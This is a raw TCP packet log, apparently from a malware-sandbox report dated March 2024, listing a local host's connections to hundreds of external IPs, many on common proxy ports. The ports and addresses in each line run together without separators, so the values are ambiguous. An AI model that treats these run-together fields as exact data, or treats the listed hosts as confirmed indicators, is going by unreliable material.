                                                                Mar 11, 2024 16:15:14.926722050 CET8050379104.25.167.88192.168.2.4
                                                                Mar 11, 2024 16:15:14.926827908 CET8050379104.25.167.88192.168.2.4
                                                                Mar 11, 2024 16:15:14.926898003 CET55555032014.225.254.128192.168.2.4
                                                                Mar 11, 2024 16:15:14.927186966 CET5037980192.168.2.4104.25.167.88
                                                                Mar 11, 2024 16:15:14.927567959 CET8050379104.25.167.88192.168.2.4
                                                                Mar 11, 2024 16:15:14.927671909 CET5037980192.168.2.4104.25.167.88
                                                                Mar 11, 2024 16:15:14.928035975 CET499003128192.168.2.418.134.236.231
                                                                Mar 11, 2024 16:15:14.928065062 CET507538080192.168.2.4154.126.81.163
                                                                Mar 11, 2024 16:15:14.928366899 CET507548888192.168.2.435.199.90.225
                                                                Mar 11, 2024 16:15:14.928556919 CET8050073222.255.238.159192.168.2.4
                                                                Mar 11, 2024 16:15:14.928637028 CET5075564579192.168.2.4162.214.121.173
                                                                Mar 11, 2024 16:15:14.928941011 CET805030412.176.231.147192.168.2.4
                                                                Mar 11, 2024 16:15:14.928951025 CET507577999192.168.2.4122.185.198.242
                                                                Mar 11, 2024 16:15:14.928952932 CET507564153192.168.2.446.28.72.75
                                                                Mar 11, 2024 16:15:14.928970098 CET805030412.176.231.147192.168.2.4
                                                                Mar 11, 2024 16:15:14.929265022 CET5030480192.168.2.412.176.231.147
                                                                Mar 11, 2024 16:15:14.929265022 CET5030480192.168.2.412.176.231.147
                                                                Mar 11, 2024 16:15:14.929549932 CET5076080192.168.2.4139.99.244.154
                                                                Mar 11, 2024 16:15:14.929553032 CET5075817639192.168.2.445.81.232.17
                                                                Mar 11, 2024 16:15:14.929761887 CET5075915805192.168.2.4172.93.111.87
                                                                Mar 11, 2024 16:15:14.929831028 CET5076280192.168.2.4172.67.127.188
                                                                Mar 11, 2024 16:15:14.929881096 CET5076119770192.168.2.4207.244.255.174
                                                                Mar 11, 2024 16:15:14.930205107 CET8050073222.255.238.159192.168.2.4
                                                                Mar 11, 2024 16:15:14.930222034 CET415350350212.31.100.138192.168.2.4
                                                                Mar 11, 2024 16:15:14.930636883 CET507638080192.168.2.4165.227.95.2
                                                                Mar 11, 2024 16:15:14.930639982 CET5076434405192.168.2.4212.110.188.198
                                                                Mar 11, 2024 16:15:14.930771112 CET503504153192.168.2.4212.31.100.138
                                                                Mar 11, 2024 16:15:14.930993080 CET503504153192.168.2.4212.31.100.138
                                                                Mar 11, 2024 16:15:14.931039095 CET8050386172.67.231.3192.168.2.4
                                                                Mar 11, 2024 16:15:14.931071997 CET8050386172.67.231.3192.168.2.4
                                                                Mar 11, 2024 16:15:14.931093931 CET5076580192.168.2.418.142.81.218
                                                                Mar 11, 2024 16:15:14.931360960 CET8050386172.67.231.3192.168.2.4
                                                                Mar 11, 2024 16:15:14.931487083 CET5038680192.168.2.4172.67.231.3
                                                                Mar 11, 2024 16:15:14.931813955 CET5038680192.168.2.4172.67.231.3
                                                                Mar 11, 2024 16:15:14.932434082 CET5076736779192.168.2.4147.124.212.31
                                                                Mar 11, 2024 16:15:14.932898045 CET5000425639192.168.2.467.43.227.226
                                                                Mar 11, 2024 16:15:14.932903051 CET499035678192.168.2.4176.119.227.65
                                                                Mar 11, 2024 16:15:14.932919025 CET498481080192.168.2.493.171.243.253
                                                                Mar 11, 2024 16:15:14.932920933 CET49842999192.168.2.445.181.123.145
                                                                Mar 11, 2024 16:15:14.932920933 CET4985116379192.168.2.4163.172.147.9
                                                                Mar 11, 2024 16:15:14.932920933 CET498448080192.168.2.4193.34.21.200
                                                                Mar 11, 2024 16:15:14.932959080 CET498475678192.168.2.445.228.147.209
                                                                Mar 11, 2024 16:15:14.932960033 CET5076662916192.168.2.451.222.241.8
                                                                Mar 11, 2024 16:15:14.933397055 CET507688080192.168.2.4203.150.172.151
                                                                Mar 11, 2024 16:15:14.933943987 CET3945250410167.172.109.12192.168.2.4
                                                                Mar 11, 2024 16:15:14.933974981 CET5076964523192.168.2.446.105.44.29
                                                                Mar 11, 2024 16:15:14.934266090 CET507705678192.168.2.436.66.133.19
                                                                Mar 11, 2024 16:15:14.934868097 CET567849784178.212.51.79192.168.2.4
                                                                Mar 11, 2024 16:15:14.934897900 CET5077180192.168.2.4172.67.182.107
                                                                Mar 11, 2024 16:15:14.935313940 CET507721080192.168.2.4143.137.116.72
                                                                Mar 11, 2024 16:15:14.935439110 CET507734228192.168.2.45.161.219.13
                                                                Mar 11, 2024 16:15:14.936103106 CET5077443328192.168.2.4192.169.226.96
                                                                Mar 11, 2024 16:15:14.936228037 CET5077511339192.168.2.467.43.228.251
                                                                Mar 11, 2024 16:15:14.936599970 CET507765678192.168.2.4115.75.160.196
                                                                Mar 11, 2024 16:15:14.936911106 CET507773128192.168.2.4103.28.121.58
                                                                Mar 11, 2024 16:15:14.937199116 CET5077880192.168.2.465.1.244.232
                                                                Mar 11, 2024 16:15:14.937302113 CET5077980192.168.2.4190.5.77.211
                                                                Mar 11, 2024 16:15:14.937522888 CET8050357186.124.164.213192.168.2.4
                                                                Mar 11, 2024 16:15:14.937733889 CET5035780192.168.2.4186.124.164.213
                                                                Mar 11, 2024 16:15:14.937972069 CET5035780192.168.2.4186.124.164.213
                                                                Mar 11, 2024 16:15:14.937988997 CET81234978320.24.43.214192.168.2.4
                                                                Mar 11, 2024 16:15:14.938043118 CET414549753152.32.78.24192.168.2.4
                                                                Mar 11, 2024 16:15:14.938098907 CET507801976192.168.2.4217.52.247.86
                                                                Mar 11, 2024 16:15:14.938338041 CET8050411172.67.3.98192.168.2.4
                                                                Mar 11, 2024 16:15:14.938419104 CET8050411172.67.3.98192.168.2.4
                                                                Mar 11, 2024 16:15:14.938443899 CET507818080192.168.2.4165.16.67.238
                                                                Mar 11, 2024 16:15:14.938642025 CET5041180192.168.2.4172.67.3.98
                                                                Mar 11, 2024 16:15:14.938827991 CET8050411172.67.3.98192.168.2.4
                                                                Mar 11, 2024 16:15:14.938921928 CET5041180192.168.2.4172.67.3.98
                                                                Mar 11, 2024 16:15:14.939450026 CET8050414104.24.193.186192.168.2.4
                                                                Mar 11, 2024 16:15:14.939477921 CET8050414104.24.193.186192.168.2.4
                                                                Mar 11, 2024 16:15:14.939523935 CET8050227172.67.150.173192.168.2.4
                                                                Mar 11, 2024 16:15:14.939656019 CET5041480192.168.2.4104.24.193.186
                                                                Mar 11, 2024 16:15:14.939682007 CET8050414104.24.193.186192.168.2.4
                                                                Mar 11, 2024 16:15:14.939739943 CET5041480192.168.2.4104.24.193.186
                                                                Mar 11, 2024 16:15:14.940236092 CET8050254195.23.57.78192.168.2.4
                                                                Mar 11, 2024 16:15:14.941083908 CET8050239104.20.24.214192.168.2.4
                                                                Mar 11, 2024 16:15:14.941528082 CET5078380192.168.2.450.175.212.79
                                                                Mar 11, 2024 16:15:14.941693068 CET8050421104.25.81.82192.168.2.4
                                                                Mar 11, 2024 16:15:14.941729069 CET5078480192.168.2.450.207.199.80
                                                                Mar 11, 2024 16:15:14.941729069 CET5078547354192.168.2.467.213.212.49
                                                                Mar 11, 2024 16:15:14.941735029 CET8050421104.25.81.82192.168.2.4
                                                                Mar 11, 2024 16:15:14.941761971 CET5078662952192.168.2.4104.248.158.78
                                                                Mar 11, 2024 16:15:14.941881895 CET5042180192.168.2.4104.25.81.82
                                                                Mar 11, 2024 16:15:14.942111015 CET5078764110192.168.2.4164.92.86.113
                                                                Mar 11, 2024 16:15:14.942441940 CET8050421104.25.81.82192.168.2.4
                                                                Mar 11, 2024 16:15:14.942858934 CET4149150427167.172.109.12192.168.2.4
                                                                Mar 11, 2024 16:15:14.942888021 CET5042180192.168.2.4104.25.81.82
                                                                Mar 11, 2024 16:15:14.942946911 CET5078823685192.168.2.472.10.160.90
                                                                Mar 11, 2024 16:15:14.943094969 CET507908089192.168.2.4118.117.190.148
                                                                Mar 11, 2024 16:15:14.943254948 CET5078946919192.168.2.451.15.16.96
                                                                Mar 11, 2024 16:15:14.943372965 CET492025039451.161.131.84192.168.2.4
                                                                Mar 11, 2024 16:15:14.943794966 CET507917117192.168.2.4135.181.102.118
                                                                Mar 11, 2024 16:15:14.943895102 CET507929090192.168.2.491.241.217.58
                                                                Mar 11, 2024 16:15:14.943973064 CET5039449202192.168.2.451.161.131.84
                                                                Mar 11, 2024 16:15:14.944061995 CET5039449202192.168.2.451.161.131.84
                                                                Mar 11, 2024 16:15:14.944457054 CET507938081192.168.2.4178.141.249.246
                                                                Mar 11, 2024 16:15:14.944607973 CET808950366117.70.49.27192.168.2.4
                                                                Mar 11, 2024 16:15:14.944719076 CET5079437976192.168.2.4162.214.227.68
                                                                Mar 11, 2024 16:15:14.945312023 CET5079564556192.168.2.4213.136.79.177
                                                                Mar 11, 2024 16:15:14.945395947 CET507966005192.168.2.445.11.95.166
                                                                Mar 11, 2024 16:15:14.945553064 CET912350359173.249.29.243192.168.2.4
                                                                Mar 11, 2024 16:15:14.945568085 CET8050245172.67.38.96192.168.2.4
                                                                Mar 11, 2024 16:15:14.945997000 CET503599123192.168.2.4173.249.29.243
                                                                Mar 11, 2024 16:15:14.945997000 CET503599123192.168.2.4173.249.29.243
                                                                Mar 11, 2024 16:15:14.946080923 CET5079780192.168.2.4123.110.158.236
                                                                Mar 11, 2024 16:15:14.946682930 CET507998080192.168.2.445.150.25.132
                                                                Mar 11, 2024 16:15:14.946685076 CET5079880192.168.2.450.170.90.34
                                                                Mar 11, 2024 16:15:14.947221994 CET508007497192.168.2.4187.191.53.155
                                                                Mar 11, 2024 16:15:14.947422981 CET508014153192.168.2.4177.131.29.211
                                                                Mar 11, 2024 16:15:14.947607994 CET805052050.239.72.17192.168.2.4
                                                                Mar 11, 2024 16:15:14.948003054 CET5080280192.168.2.450.168.163.180
                                                                Mar 11, 2024 16:15:14.948007107 CET508034850192.168.2.4192.169.226.96
                                                                Mar 11, 2024 16:15:14.948540926 CET4986618877192.168.2.4178.128.207.96
                                                                Mar 11, 2024 16:15:14.948581934 CET4985413335192.168.2.4172.67.185.199
                                                                Mar 11, 2024 16:15:14.948649883 CET498505678192.168.2.4123.108.98.108
                                                                Mar 11, 2024 16:15:14.948957920 CET498601080192.168.2.45.252.23.220
                                                                Mar 11, 2024 16:15:14.949033022 CET805059131.43.179.160192.168.2.4
                                                                Mar 11, 2024 16:15:14.949681044 CET508045369192.168.2.472.10.160.171
                                                                Mar 11, 2024 16:15:14.949681044 CET508053128192.168.2.4134.209.29.120
                                                                Mar 11, 2024 16:15:14.949790001 CET5059180192.168.2.431.43.179.160
                                                                Mar 11, 2024 16:15:14.950043917 CET508064145192.168.2.474.119.147.209
                                                                Mar 11, 2024 16:15:14.950043917 CET5059180192.168.2.431.43.179.160
                                                                Mar 11, 2024 16:15:14.950944901 CET805025131.43.179.214192.168.2.4
                                                                Mar 11, 2024 16:15:14.950984955 CET5080756581192.168.2.4159.223.71.71
                                                                Mar 11, 2024 16:15:14.951288939 CET5080855636192.168.2.41.179.148.9
                                                                Mar 11, 2024 16:15:14.951292038 CET508093629192.168.2.4190.3.72.38
                                                                Mar 11, 2024 16:15:14.952008009 CET508108083192.168.2.4103.84.177.28
                                                                Mar 11, 2024 16:15:14.953053951 CET508124145192.168.2.4168.205.217.37
                                                                Mar 11, 2024 16:15:14.953057051 CET5081159623192.168.2.462.182.114.164
                                                                Mar 11, 2024 16:15:14.953514099 CET508135678192.168.2.493.182.76.244
                                                                Mar 11, 2024 16:15:14.953964949 CET414550523142.54.231.38192.168.2.4
                                                                Mar 11, 2024 16:15:14.954003096 CET508148080192.168.2.4103.172.42.121
                                                                Mar 11, 2024 16:15:14.954099894 CET505234145192.168.2.4142.54.231.38
                                                                Mar 11, 2024 16:15:14.954243898 CET505234145192.168.2.4142.54.231.38
                                                                Mar 11, 2024 16:15:14.954330921 CET508158080192.168.2.4180.191.254.130
                                                                Mar 11, 2024 16:15:14.954601049 CET5081683192.168.2.4103.183.63.14
                                                                Mar 11, 2024 16:15:14.954601049 CET508173629192.168.2.4190.3.72.39
                                                                Mar 11, 2024 16:15:14.955255985 CET508188282192.168.2.4193.138.178.6
                                                                Mar 11, 2024 16:15:14.955754042 CET508191976192.168.2.441.65.236.56
                                                                Mar 11, 2024 16:15:14.955754042 CET5082080192.168.2.4119.81.71.27
                                                                Mar 11, 2024 16:15:14.955816984 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:14.955883026 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:14.955928087 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:14.955986977 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:14.956132889 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:14.956188917 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:14.956238031 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:14.956294060 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:14.956334114 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:14.956371069 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:14.956424952 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:14.956567049 CET888850456188.166.30.17192.168.2.4
                                                                Mar 11, 2024 16:15:14.957094908 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:14.957135916 CET5082228513192.168.2.4213.136.78.200
                                                                Mar 11, 2024 16:15:14.957245111 CET5082180192.168.2.4104.27.26.29
                                                                Mar 11, 2024 16:15:14.959927082 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:14.960511923 CET5082480192.168.2.450.207.199.87
                                                                Mar 11, 2024 16:15:14.960517883 CET5082380192.168.2.4172.67.181.12
                                                                Mar 11, 2024 16:15:14.960745096 CET5082533572192.168.2.4162.214.121.173
                                                                Mar 11, 2024 16:15:14.960948944 CET508271372192.168.2.4159.223.166.21
                                                                Mar 11, 2024 16:15:14.960990906 CET508268595192.168.2.4132.148.128.88
                                                                Mar 11, 2024 16:15:14.961042881 CET508288080192.168.2.437.120.192.154
                                                                Mar 11, 2024 16:15:14.961236000 CET5083013276192.168.2.4147.124.212.31
                                                                Mar 11, 2024 16:15:14.961239100 CET5082980192.168.2.4104.27.37.131
                                                                Mar 11, 2024 16:15:14.961298943 CET567850308103.112.254.66192.168.2.4
                                                                Mar 11, 2024 16:15:14.961838961 CET508315678192.168.2.479.7.101.98
                                                                Mar 11, 2024 16:15:14.961874008 CET508321080192.168.2.4103.47.93.194
                                                                Mar 11, 2024 16:15:14.962393045 CET8080504598.218.100.120192.168.2.4
                                                                Mar 11, 2024 16:15:14.962433100 CET50833999192.168.2.438.7.4.89
                                                                Mar 11, 2024 16:15:14.963259935 CET508354145192.168.2.4185.169.181.25
                                                                Mar 11, 2024 16:15:14.963260889 CET5083680192.168.2.489.31.143.12
                                                                Mar 11, 2024 16:15:14.963280916 CET504598080192.168.2.48.218.100.120
                                                                Mar 11, 2024 16:15:14.963280916 CET504598080192.168.2.48.218.100.120
                                                                Mar 11, 2024 16:15:14.963280916 CET5083417228192.168.2.4207.180.198.241
                                                                Mar 11, 2024 16:15:14.963341951 CET2710250391128.199.196.31192.168.2.4
                                                                Mar 11, 2024 16:15:14.963489056 CET5039127102192.168.2.4128.199.196.31
                                                                Mar 11, 2024 16:15:14.963668108 CET5039127102192.168.2.4128.199.196.31
                                                                Mar 11, 2024 16:15:14.963670969 CET508374145192.168.2.4192.111.134.10
                                                                Mar 11, 2024 16:15:14.963926077 CET5083838817192.168.2.477.48.23.181
                                                                Mar 11, 2024 16:15:14.963929892 CET5083980192.168.2.4149.102.130.120
                                                                Mar 11, 2024 16:15:14.964160919 CET500333128192.168.2.4178.128.148.69
                                                                Mar 11, 2024 16:15:14.964160919 CET498583128192.168.2.4155.50.241.99
                                                                Mar 11, 2024 16:15:14.964178085 CET500405385192.168.2.472.10.160.170
                                                                Mar 11, 2024 16:15:14.964179039 CET498688080192.168.2.485.117.60.162
                                                                Mar 11, 2024 16:15:14.964180946 CET5002334350192.168.2.466.29.128.246
                                                                Mar 11, 2024 16:15:14.964201927 CET4985980192.168.2.452.24.80.166
                                                                Mar 11, 2024 16:15:14.964293003 CET80805024266.225.246.238192.168.2.4
                                                                Mar 11, 2024 16:15:14.964581013 CET80805024266.225.246.238192.168.2.4
                                                                Mar 11, 2024 16:15:14.964620113 CET80805061066.225.246.238192.168.2.4
                                                                Mar 11, 2024 16:15:14.964757919 CET506108080192.168.2.466.225.246.238
                                                                Mar 11, 2024 16:15:14.965065002 CET506108080192.168.2.466.225.246.238
                                                                Mar 11, 2024 16:15:14.965296984 CET508402233192.168.2.4104.131.77.66
                                                                Mar 11, 2024 16:15:14.965437889 CET508418080192.168.2.4115.96.208.124
                                                                Mar 11, 2024 16:15:14.966882944 CET508424145192.168.2.4142.54.232.6
                                                                Mar 11, 2024 16:15:14.967138052 CET730250250124.163.236.54192.168.2.4
                                                                Mar 11, 2024 16:15:14.967277050 CET502507302192.168.2.4124.163.236.54
                                                                Mar 11, 2024 16:15:14.967456102 CET502507302192.168.2.4124.163.236.54
                                                                Mar 11, 2024 16:15:14.967603922 CET8050468172.67.14.237192.168.2.4
                                                                Mar 11, 2024 16:15:14.967609882 CET508439002192.168.2.439.165.0.137
                                                                Mar 11, 2024 16:15:14.967618942 CET8050468172.67.14.237192.168.2.4
                                                                Mar 11, 2024 16:15:14.967736006 CET508448181192.168.2.4103.152.232.99
                                                                Mar 11, 2024 16:15:14.968235970 CET5046880192.168.2.4172.67.14.237
                                                                Mar 11, 2024 16:15:14.968326092 CET508454145192.168.2.4103.210.35.40
                                                                Mar 11, 2024 16:15:14.968411922 CET8050468172.67.14.237192.168.2.4
                                                                Mar 11, 2024 16:15:14.968600035 CET80805041291.148.127.162192.168.2.4
                                                                Mar 11, 2024 16:15:14.968635082 CET508468080192.168.2.4125.26.183.79
                                                                Mar 11, 2024 16:15:14.968638897 CET8050470185.238.228.240192.168.2.4
                                                                Mar 11, 2024 16:15:14.968652964 CET8050470185.238.228.240192.168.2.4
                                                                Mar 11, 2024 16:15:14.968739986 CET504128080192.168.2.491.148.127.162
                                                                Mar 11, 2024 16:15:14.968830109 CET504128080192.168.2.491.148.127.162
                                                                Mar 11, 2024 16:15:14.968830109 CET5047080192.168.2.4185.238.228.240
                                                                Mar 11, 2024 16:15:14.969109058 CET8050470185.238.228.240192.168.2.4
                                                                Mar 11, 2024 16:15:14.969213009 CET5046880192.168.2.4172.67.14.237
                                                                Mar 11, 2024 16:15:14.969371080 CET5047080192.168.2.4185.238.228.240
                                                                Mar 11, 2024 16:15:14.969957113 CET5084734227192.168.2.4162.214.102.195
                                                                Mar 11, 2024 16:15:14.970917940 CET508488080192.168.2.4177.229.210.50
                                                                Mar 11, 2024 16:15:14.971024036 CET508504985192.168.2.482.223.121.72
                                                                Mar 11, 2024 16:15:14.971025944 CET508498089192.168.2.4111.225.153.135
                                                                Mar 11, 2024 16:15:14.971172094 CET5085138586192.168.2.4160.153.245.187
                                                                Mar 11, 2024 16:15:14.971776009 CET5085280192.168.2.4188.40.44.95
                                                                Mar 11, 2024 16:15:14.971993923 CET5085332650192.168.2.4103.216.51.36
                                                                Mar 11, 2024 16:15:14.972443104 CET50854999192.168.2.438.56.23.33
                                                                Mar 11, 2024 16:15:14.975176096 CET5085518129192.168.2.467.43.236.20
                                                                Mar 11, 2024 16:15:14.975176096 CET508563629192.168.2.4177.86.64.1
                                                                Mar 11, 2024 16:15:14.975661039 CET508574145192.168.2.472.210.221.197
                                                                Mar 11, 2024 16:15:14.975991011 CET508591080192.168.2.4176.115.79.195
                                                                Mar 11, 2024 16:15:14.975997925 CET508588080192.168.2.4183.89.79.25
                                                                Mar 11, 2024 16:15:14.976190090 CET508604145192.168.2.4174.77.111.197
                                                                Mar 11, 2024 16:15:14.976465940 CET8050268104.17.171.235192.168.2.4
                                                                Mar 11, 2024 16:15:14.977292061 CET508618090192.168.2.489.230.92.9
                                                                Mar 11, 2024 16:15:14.977740049 CET508623128192.168.2.45.34.201.244
                                                                Mar 11, 2024 16:15:14.978169918 CET414550426103.58.16.57192.168.2.4
                                                                Mar 11, 2024 16:15:14.978207111 CET5086380192.168.2.4104.16.241.204
                                                                Mar 11, 2024 16:15:14.978362083 CET508658080192.168.2.4187.228.145.138
                                                                Mar 11, 2024 16:15:14.978432894 CET50864999192.168.2.4190.217.7.8
                                                                Mar 11, 2024 16:15:14.978945017 CET108050400202.162.219.10192.168.2.4
                                                                Mar 11, 2024 16:15:14.978961945 CET8050616185.238.228.202192.168.2.4
                                                                Mar 11, 2024 16:15:14.979187012 CET5086726693192.168.2.467.43.236.20
                                                                Mar 11, 2024 16:15:14.979188919 CET5086653343192.168.2.466.23.233.210
                                                                Mar 11, 2024 16:15:14.979260921 CET504001080192.168.2.4202.162.219.10
                                                                Mar 11, 2024 16:15:14.979300976 CET5061680192.168.2.4185.238.228.202
                                                                Mar 11, 2024 16:15:14.979372978 CET504001080192.168.2.4202.162.219.10
                                                                Mar 11, 2024 16:15:14.979767084 CET8050619104.25.87.42192.168.2.4
                                                                Mar 11, 2024 16:15:14.979783058 CET5061680192.168.2.4185.238.228.202
                                                                Mar 11, 2024 16:15:14.979787111 CET4986260781192.168.2.4132.148.129.254
                                                                Mar 11, 2024 16:15:14.979793072 CET498618080192.168.2.4160.19.169.208
                                                                Mar 11, 2024 16:15:14.979794025 CET498705005192.168.2.41.194.236.229
                                                                Mar 11, 2024 16:15:14.979806900 CET4995715673192.168.2.443.131.245.216
                                                                Mar 11, 2024 16:15:14.979806900 CET4997080192.168.2.450.170.90.24
                                                                Mar 11, 2024 16:15:14.979808092 CET498788080192.168.2.4176.88.166.218
                                                                Mar 11, 2024 16:15:14.979808092 CET49881999192.168.2.4179.1.192.27
                                                                Mar 11, 2024 16:15:14.979806900 CET498648089192.168.2.4123.182.58.221
                                                                Mar 11, 2024 16:15:14.979813099 CET5007380192.168.2.4222.255.238.159
                                                                Mar 11, 2024 16:15:14.979823112 CET4999980192.168.2.450.172.75.125
                                                                Mar 11, 2024 16:15:14.979824066 CET4987131679192.168.2.498.162.25.29
                                                                Mar 11, 2024 16:15:14.979967117 CET5061980192.168.2.4104.25.87.42
                                                                Mar 11, 2024 16:15:14.979967117 CET5061980192.168.2.4104.25.87.42
                                                                Mar 11, 2024 16:15:14.980097055 CET49867999192.168.2.4181.65.169.37
                                                                Mar 11, 2024 16:15:14.980338097 CET5086980192.168.2.452.67.10.183
                                                                Mar 11, 2024 16:15:14.980341911 CET5086880192.168.2.450.174.145.14
                                                                Mar 11, 2024 16:15:14.980823040 CET1233449778194.4.50.91192.168.2.4
                                                                Mar 11, 2024 16:15:14.981071949 CET8050620104.21.223.181192.168.2.4
                                                                Mar 11, 2024 16:15:14.981297970 CET50870999192.168.2.4190.211.250.131
                                                                Mar 11, 2024 16:15:14.981362104 CET5062080192.168.2.4104.21.223.181
                                                                Mar 11, 2024 16:15:14.981394053 CET4977812334192.168.2.4194.4.50.91
                                                                Mar 11, 2024 16:15:14.981481075 CET5062080192.168.2.4104.21.223.181
                                                                Mar 11, 2024 16:15:14.981777906 CET4977812334192.168.2.4194.4.50.91
                                                                Mar 11, 2024 16:15:14.982517958 CET5087246097192.168.2.4162.241.46.40
                                                                Mar 11, 2024 16:15:14.982522011 CET5087154393192.168.2.445.81.232.17
                                                                Mar 11, 2024 16:15:14.982851028 CET508738080192.168.2.4112.78.170.250
                                                                Mar 11, 2024 16:15:14.982906103 CET1586450564192.252.214.20192.168.2.4
                                                                Mar 11, 2024 16:15:14.983104944 CET5087428723192.168.2.467.43.227.227
                                                                Mar 11, 2024 16:15:14.983992100 CET156735056823.95.209.142192.168.2.4
                                                                Mar 11, 2024 16:15:14.984006882 CET166915053192.204.136.149192.168.2.4
                                                                Mar 11, 2024 16:15:14.984045982 CET508751080192.168.2.4188.255.245.205
                                                                Mar 11, 2024 16:15:14.984169960 CET5056815673192.168.2.423.95.209.142
                                                                Mar 11, 2024 16:15:14.984349012 CET5056815673192.168.2.423.95.209.142
                                                                Mar 11, 2024 16:15:14.984652996 CET508779090192.168.2.438.10.69.109
                                                                Mar 11, 2024 16:15:14.984730005 CET5087684192.168.2.4103.255.145.62
                                                                Mar 11, 2024 16:15:14.984869957 CET508788080192.168.2.446.105.35.193
                                                                Mar 11, 2024 16:15:14.985608101 CET51235054372.10.160.92192.168.2.4
                                                                Mar 11, 2024 16:15:14.985776901 CET505435123192.168.2.472.10.160.92
                                                                Mar 11, 2024 16:15:14.985934973 CET505435123192.168.2.472.10.160.92
                                                                Mar 11, 2024 16:15:14.986149073 CET5088080192.168.2.434.75.202.63
                                                                Mar 11, 2024 16:15:14.986229897 CET508798080192.168.2.4103.69.151.189
                                                                Mar 11, 2024 16:15:14.986968994 CET312850529159.203.61.169192.168.2.4
                                                                Mar 11, 2024 16:15:14.987176895 CET505293128192.168.2.4159.203.61.169
                                                                Mar 11, 2024 16:15:14.987176895 CET505293128192.168.2.4159.203.61.169
                                                                Mar 11, 2024 16:15:14.987200022 CET5088221355192.168.2.467.213.212.36
                                                                Mar 11, 2024 16:15:14.987200022 CET5088160775192.168.2.451.89.173.40
                                                                Mar 11, 2024 16:15:14.988303900 CET50883999192.168.2.438.156.233.77
                                                                Mar 11, 2024 16:15:14.988449097 CET909150018120.37.121.209192.168.2.4
                                                                Mar 11, 2024 16:15:14.988464117 CET909150018120.37.121.209192.168.2.4
                                                                Mar 11, 2024 16:15:14.988478899 CET508848080192.168.2.4177.128.212.190
                                                                Mar 11, 2024 16:15:14.988720894 CET500189091192.168.2.4120.37.121.209
                                                                Mar 11, 2024 16:15:14.989130020 CET508864145192.168.2.482.137.244.59
                                                                Mar 11, 2024 16:15:14.989130974 CET508858080192.168.2.4125.209.88.46
                                                                Mar 11, 2024 16:15:14.989191055 CET909150018120.37.121.209192.168.2.4
                                                                Mar 11, 2024 16:15:14.989207029 CET543050089202.179.184.44192.168.2.4
                                                                Mar 11, 2024 16:15:14.989249945 CET543050089202.179.184.44192.168.2.4
                                                                Mar 11, 2024 16:15:14.989264011 CET8050641104.16.109.207192.168.2.4
                                                                Mar 11, 2024 16:15:14.989304066 CET500189091192.168.2.4120.37.121.209
                                                                Mar 11, 2024 16:15:14.989304066 CET500895430192.168.2.4202.179.184.44
                                                                Mar 11, 2024 16:15:14.989413977 CET500895430192.168.2.4202.179.184.44
                                                                Mar 11, 2024 16:15:14.989425898 CET5064180192.168.2.4104.16.109.207
                                                                Mar 11, 2024 16:15:14.989458084 CET5064180192.168.2.4104.16.109.207
                                                                Mar 11, 2024 16:15:14.989618063 CET508875430192.168.2.4202.179.184.44
                                                                Mar 11, 2024 16:15:14.990293026 CET273915049772.195.34.60192.168.2.4
                                                                Mar 11, 2024 16:15:14.990448952 CET5049727391192.168.2.472.195.34.60
                                                                Mar 11, 2024 16:15:14.990518093 CET8050303172.67.181.129192.168.2.4
                                                                Mar 11, 2024 16:15:14.990551949 CET5049727391192.168.2.472.195.34.60
                                                                Mar 11, 2024 16:15:14.990797043 CET8050282172.67.182.126192.168.2.4
                                                                Mar 11, 2024 16:15:14.991297960 CET8050313104.17.166.210192.168.2.4
                                                                Mar 11, 2024 16:15:14.991408110 CET508888080192.168.2.4188.132.222.167
                                                                Mar 11, 2024 16:15:14.995428085 CET498768080192.168.2.4181.212.45.228
                                                                Mar 11, 2024 16:15:14.995431900 CET4987231337192.168.2.4186.251.255.73
                                                                Mar 11, 2024 16:15:14.995444059 CET5004380192.168.2.450.168.210.239
                                                                Mar 11, 2024 16:15:14.995460987 CET4989117045192.168.2.488.202.230.103
                                                                Mar 11, 2024 16:15:14.995466948 CET498744153192.168.2.4190.2.104.201
                                                                Mar 11, 2024 16:15:14.995466948 CET4988315430192.168.2.492.205.110.118
                                                                Mar 11, 2024 16:15:14.995466948 CET4988827234192.168.2.4168.228.36.22
                                                                Mar 11, 2024 16:15:14.995466948 CET4989080192.168.2.4194.186.127.60
                                                                Mar 11, 2024 16:15:14.995471954 CET4988251405192.168.2.451.81.186.179
                                                                Mar 11, 2024 16:15:14.995487928 CET498928181192.168.2.4103.78.96.146
                                                                Mar 11, 2024 16:15:14.995490074 CET498858080192.168.2.4105.174.40.54
                                                                Mar 11, 2024 16:15:14.995493889 CET4987983192.168.2.4103.168.164.94
                                                                Mar 11, 2024 16:15:14.995511055 CET99950519190.71.24.129192.168.2.4
                                                                Mar 11, 2024 16:15:14.995512962 CET4988664120192.168.2.4161.97.163.52
                                                                Mar 11, 2024 16:15:14.995512962 CET498948080192.168.2.487.76.1.251
                                                                Mar 11, 2024 16:15:14.999255896 CET888850442120.79.101.0192.168.2.4
                                                                Mar 11, 2024 16:15:14.999643087 CET80005007714.103.24.20192.168.2.4
                                                                Mar 11, 2024 16:15:15.000072956 CET504428888192.168.2.4120.79.101.0
                                                                Mar 11, 2024 16:15:15.000283003 CET41455024368.1.210.163192.168.2.4
                                                                Mar 11, 2024 16:15:15.000318050 CET41455024368.1.210.163192.168.2.4
                                                                Mar 11, 2024 16:15:15.001292944 CET804991150.168.72.112192.168.2.4
                                                                Mar 11, 2024 16:15:15.001789093 CET1428250611192.252.208.70192.168.2.4
                                                                Mar 11, 2024 16:15:15.003278017 CET4678350603162.241.158.204192.168.2.4
                                                                Mar 11, 2024 16:15:15.003906965 CET80805039595.57.216.118192.168.2.4
                                                                Mar 11, 2024 16:15:15.003962994 CET31285057323.152.40.14192.168.2.4
                                                                Mar 11, 2024 16:15:15.004070997 CET503958080192.168.2.495.57.216.118
